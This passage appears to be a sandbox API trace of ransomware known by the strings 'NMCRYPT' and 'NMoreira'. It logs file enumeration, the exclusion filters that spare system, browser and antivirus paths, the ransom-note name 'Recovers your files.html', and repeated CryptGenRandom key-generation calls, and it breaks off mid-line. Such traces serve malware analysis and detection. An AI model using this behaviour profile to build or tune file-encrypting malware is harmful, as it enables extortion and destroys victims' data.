(pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*Atheros*") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*Realtek*") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*bootmgr*") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*boot*") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*boot*") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*CONFIG.SYS*") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*IO.SYS*") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*MSDOS.SYS*") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*NTDETECT.COM*") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*ntldr*") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*chrome*") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*opera*") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*firefox*") returned 0 [0166.815] wcslen (_String="\\\\?\\") returned 0x4 [0166.815] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 0x9ad2f8 [0166.816] wcscmp (_String1=".", _String2=".") returned 0 [0166.816] FindNextFileW (in: hFindFile=0x9ad2f8, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0166.816] wcscmp (_String1="..", _String2=".") returned 1 [0166.816] wcscmp (_String1="..", _String2="..") returned 0 [0166.816] FindNextFileW (in: hFindFile=0x9ad2f8, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0166.816] PathMatchSpecW (pszFile="VSTOInstallerUI.dll", pszSpec="*NMCRYPT") returned 0 [0166.816] PathMatchSpecW (pszFile="VSTOInstallerUI.dll", pszSpec="*Recovers your files.html") returned 0 [0166.816] PathMatchSpecW (pszFile="VSTOInstallerUI.dll", pszSpec="*.exe") returned 0 [0166.816] PathMatchSpecW (pszFile="VSTOInstallerUI.dll", pszSpec="*.dll") returned 1 [0166.816] FindNextFileW (in: hFindFile=0x9ad2f8, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0166.816] PathMatchSpecW (pszFile="VSTOLoaderUI.dll", pszSpec="*NMCRYPT") returned 0 [0166.816] PathMatchSpecW (pszFile="VSTOLoaderUI.dll", pszSpec="*Recovers your files.html") returned 0 [0166.816] PathMatchSpecW (pszFile="VSTOLoaderUI.dll", pszSpec="*.exe") returned 0 [0166.816] PathMatchSpecW (pszFile="VSTOLoaderUI.dll", pszSpec="*.dll") returned 1 [0166.816] FindNextFileW (in: hFindFile=0x9ad2f8, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 0 [0166.816] GetLastError () returned 0x12 [0166.816] FindClose (in: hFindFile=0x9ad2f8 | out: hFindFile=0x9ad2f8) returned 1 [0166.816] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0166.816] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.817] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.817] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0166.817] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.817] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*.exe") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*.dll") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*.lnk") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*.bat") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*.ini") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*.msi") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*.scf") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*pagefile.sys*") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*NTUSER.DAT*") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*AppData*") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*\\winrar\\*") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*\\java\\*") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*\\windows\\*") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*\\ESET\\*") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*\\AVG\\*") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*\\AVIRA\\*") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*Atheros*") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*Realtek*") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*bootmgr*") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*boot*") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*boot*") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*CONFIG.SYS*") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*IO.SYS*") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*MSDOS.SYS*") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*NTDETECT.COM*") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*ntldr*") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*chrome*") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*opera*") returned 0 [0166.817] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\*", pszSpec="*firefox*") returned 0 [0166.817] wcslen (_String="\\\\?\\") returned 0x4 [0166.817] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\*", lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 0x9ad378 [0166.817] wcscmp (_String1=".", _String2=".") returned 0 [0166.817] FindNextFileW (in: hFindFile=0x9ad378, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0166.817] wcscmp (_String1="..", _String2=".") returned 1 [0166.817] wcscmp (_String1="..", _String2="..") returned 0 [0166.817] FindNextFileW (in: hFindFile=0x9ad378, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0166.817] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*NMCRYPT") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*Recovers your files.html") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*.exe") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*.dll") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*.lnk") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*.bat") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*.ini") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*.msi") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*.scf") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*pagefile.sys*") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*NTUSER.DAT*") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*AppData*") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*\\winrar\\*") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*\\java\\*") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*\\TeamViewer\\*") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*\\windows\\*") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*\\ESET\\*") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*\\AVG\\*") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*\\AVIRA\\*") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*\\AVAST Software\\*") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*Atheros*") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*Realtek*") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*bootmgr*") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*boot*") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*boot*") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*CONFIG.SYS*") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*IO.SYS*") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*MSDOS.SYS*") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*NTDETECT.COM*") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*ntldr*") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*chrome*") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*opera*") returned 0 [0166.818] PathMatchSpecW (pszFile="verisign.bmp", pszSpec="*firefox*") returned 0 [0166.818] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\Services\\verisign.bmp", pszSpec="*") returned 1 [0166.818] strlen (_Str="NMoreira") returned 0x8 [0166.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: 